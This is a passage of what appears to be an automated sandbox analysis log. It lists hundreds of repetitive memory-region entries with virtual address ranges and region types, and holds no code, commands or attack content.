"private_0x0000000000460000" filename = "" Region: id = 10635 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10636 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10637 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10638 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10639 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10640 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10641 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10642 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10643 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10644 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10645 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10646 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10647 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10648 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10649 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10650 start_va = 0x7c60000 end_va = 0x7d59fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c60000" filename = "" Region: id = 10651 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10652 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10653 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10654 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10655 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10656 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10657 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10658 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10659 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10660 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10661 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10662 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10663 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10664 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10665 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10666 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10667 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10668 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10669 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10670 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10671 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10672 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10673 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10674 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10675 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10676 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10677 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10678 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10679 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10680 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10681 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10682 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10683 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10684 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10685 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10686 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10687 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10688 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10689 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10690 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10691 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10692 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10693 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10694 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10695 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10696 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10697 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10698 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10699 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10700 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10701 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10702 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10703 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10704 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10705 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 10706 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10707 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10708 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10709 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10710 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10711 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10712 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10713 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10714 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10715 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 10716 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10717 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10718 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10719 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10720 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10721 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10722 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10723 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10724 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10725 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10726 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10727 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10728 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10729 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10730 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10731 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10732 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10733 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10734 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10735 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10736 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10737 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10738 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10739 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10740 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10741 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10742 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10743 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10744 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10745 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10746 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10747 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10748 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10749 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10750 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10751 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10752 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10753 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10754 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10755 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10756 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10757 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10758 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10759 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10760 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10761 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10762 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10763 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10764 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10765 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10766 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10767 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10768 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10769 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10770 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10771 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10772 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10773 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10774 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10775 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10776 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10777 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10778 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10779 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10780 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10781 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10782 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10783 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10784 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10785 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10786 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10787 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10788 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10789 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10790 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10791 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10792 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10793 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10794 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10795 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10796 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10797 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10798 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10799 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10800 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10801 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10802 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10803 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10804 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10805 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10806 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10807 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10808 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10809 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10810 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10811 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10812 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10813 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10814 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10815 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10816 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10817 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10818 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10819 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10820 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10821 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10822 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10823 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10824 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10825 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10826 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10827 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10828 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10829 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10830 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10831 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10832 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10833 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name 